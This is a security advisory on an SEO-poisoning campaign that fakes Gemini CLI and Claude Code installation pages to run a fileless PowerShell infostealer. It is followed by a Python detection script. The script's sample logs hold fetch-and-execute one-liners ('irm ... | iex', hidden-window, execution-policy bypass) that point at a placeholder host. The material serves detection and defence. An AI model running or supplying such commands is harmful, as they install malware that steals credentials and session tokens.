Published on May 26, 2026

Hackers Use SEO Poisoning to Impersonate Gemini CLI and Claude Code Installers
Severity

Medium

Detail

Threat actors are targeting software developers through SEO poisoning campaigns that impersonate popular AI coding tools such as Gemini CLI and Claude Code. By manipulating search engine rankings, attackers push fake installation pages above legitimate results, tricking developers into executing malicious PowerShell commands.

The campaign, active since March 2026, delivers a fileless infostealer capable of harvesting credentials, session tokens, OAuth data, and sensitive files from developer systems and enterprise collaboration platforms.

How?

The attack begins when developers search online for installation instructions for tools like Gemini CLI or Claude Code. Victims are redirected to malicious websites designed to closely mimic official documentation pages. These fake sites instruct users to copy and execute a PowerShell command, which silently downloads and runs a malicious script entirely in memory.

To avoid suspicion, the attackers simultaneously install the legitimate AI tool through npm, making the installation appear successful while the infostealer operates in the background.

Once executed, the malware disables Event Tracing for Windows (ETW) and bypasses the Antimalware Scan Interface (AMSI) to reduce visibility and evade detection. The PowerShell payload contains thousands of lines of junk code and sandbox checks designed to hinder analysis.

The infostealer then harvests sensitive data from the infected machine, including OAuth tokens, CI/CD credentials, VPN details, browser session cookies, and credentials from applications such as Slack, Microsoft Teams, Discord, and Telegram. Because valid session cookies can bypass passwords and multi-factor authentication, attackers can directly access enterprise environments and cloud services.

The malware also loads multiple C# components at runtime to extract Windows Credential Manager entries, fingerprint the system, and enumerate running processes. All operations remain fileless, leaving minimal forensic artifacts on disk.

Researchers linked the activity to over 30 malicious domains impersonating legitimate developer tools and software platforms, including Node.js, Chocolatey, KeePassXC, and Monero, indicating a broader and coordinated campaign targeting the software development ecosystem.

Conclusion

This campaign highlights how threat actors are increasingly abusing trusted developer workflows and search engine manipulation to compromise enterprise environments through developer endpoints.

Organizations should monitor for suspicious PowerShell activity, especially irm | iex execution patterns (Invoke-RestMethod output piped straight into Invoke-Expression, so the downloaded script runs without ever touching disk) and PowerShell processes launched with a hidden window. Enforcing PowerShell Constrained Language Mode, implementing phishing-resistant authentication such as FIDO keys, restricting token lifetimes, and educating developers to verify installation sources can significantly reduce exposure to these attacks.
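As an added illustration of the two detection points named above (it is not code from the source article or from the researchers it cites), the following Python script scans constructed log text modelled on PowerShell script block logging (Event ID 4104) and process-creation command lines (Event ID 4688) for the irm | iex fetch-and-execute pattern and for powershell.exe started with a hidden window. The sample records, the rule names and the severity scheme are assumptions made for this example; example.invalid is a reserved domain that never resolves.

```python
"""Detection sketch for the 'irm | iex' and hidden-window PowerShell patterns
described in the advisory, run over constructed sample log text."""
import re

# CONSTRUCTED sample records: "event" mimics the Windows event ID, "text" the
# ScriptBlockText (4104) or process command line (4688). None of this is real
# telemetry from the campaign.
SAMPLE_EVENTS = [
    {"id": 1, "event": 4104, "text": "irm https://example.invalid/install.ps1 | iex"},
    {"id": 2, "event": 4688, "text": 'powershell.exe -WindowStyle Hidden -NoProfile -Command "Start-Sleep 1"'},
    {"id": 3, "event": 4104, "text": "npm install -g some-cli-tool"},
    {"id": 4, "event": 4104, "text": "Invoke-Expression (Invoke-RestMethod 'https://example.invalid/x')"},
    {"id": 5, "event": 4688, "text": 'powershell.exe -win hidden -nop -ep bypass -c "irm https://example.invalid/a | iex"'},
    {"id": 6, "event": 4104, "text": "Get-Process | Where-Object CPU -gt 10"},
]


def _prefix_pattern(word: str) -> str:
    """Regex accepting any non-empty prefix of `word`, because powershell.exe
    accepts unambiguous parameter-name prefixes (-w, -win, -WindowStyle ...)."""
    pat = ""
    for ch in reversed(word[1:]):
        pat = f"(?:{ch}{pat})?"
    return word[0] + pat


# Remote fetch (irm / Invoke-RestMethod) and in-memory execution (iex / Invoke-Expression).
# Script block logging records the text as typed, so aliases must be matched explicitly.
FETCH_RE = re.compile(r"\b(?:irm|Invoke-RestMethod)\b", re.I)
EXEC_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
# powershell.exe launched with a hidden window, under any accepted spelling of -WindowStyle.
HIDDEN_RE = re.compile(r"-" + _prefix_pattern("windowstyle") + r"\s+hidden\b", re.I)


def classify(text: str) -> list[str]:
    """Return the names of the rules that fire for one log line (assumed rule names)."""
    hits = []
    # Both halves must be present in the same block: fetch alone is normal admin activity.
    if FETCH_RE.search(text) and EXEC_RE.search(text):
        hits.append("remote_fetch_piped_to_iex")
    if HIDDEN_RE.search(text):
        hits.append("hidden_powershell_window")
    return hits


def scan(events) -> list[dict]:
    """Scan log records and emit one finding per record with at least one rule hit."""
    findings = []
    for ev in events:
        rules = classify(ev["text"])
        if rules:
            findings.append({
                "id": ev["id"],
                "event": ev["event"],
                "rules": rules,
                # Fetch-and-execute from a hidden window together is the shape of the
                # one-liner the advisory describes, so it is rated higher (assumed scheme).
                "severity": "high" if len(rules) > 1 else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Run as-is, the script flags records 1, 2, 4 and 5 and leaves the npm install and the ordinary Get-Process pipeline alone; record 5, which combines the hidden window with the fetch-and-execute pipeline, is the only one rated high. The fetch rule deliberately requires both halves in one script block so that a plain Invoke-RestMethod call used for legitimate automation does not alert on its own.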

Source

https://cybersecuritynews.com/hackers-use-seo-poisoning-to-impersonate-gemini-cli/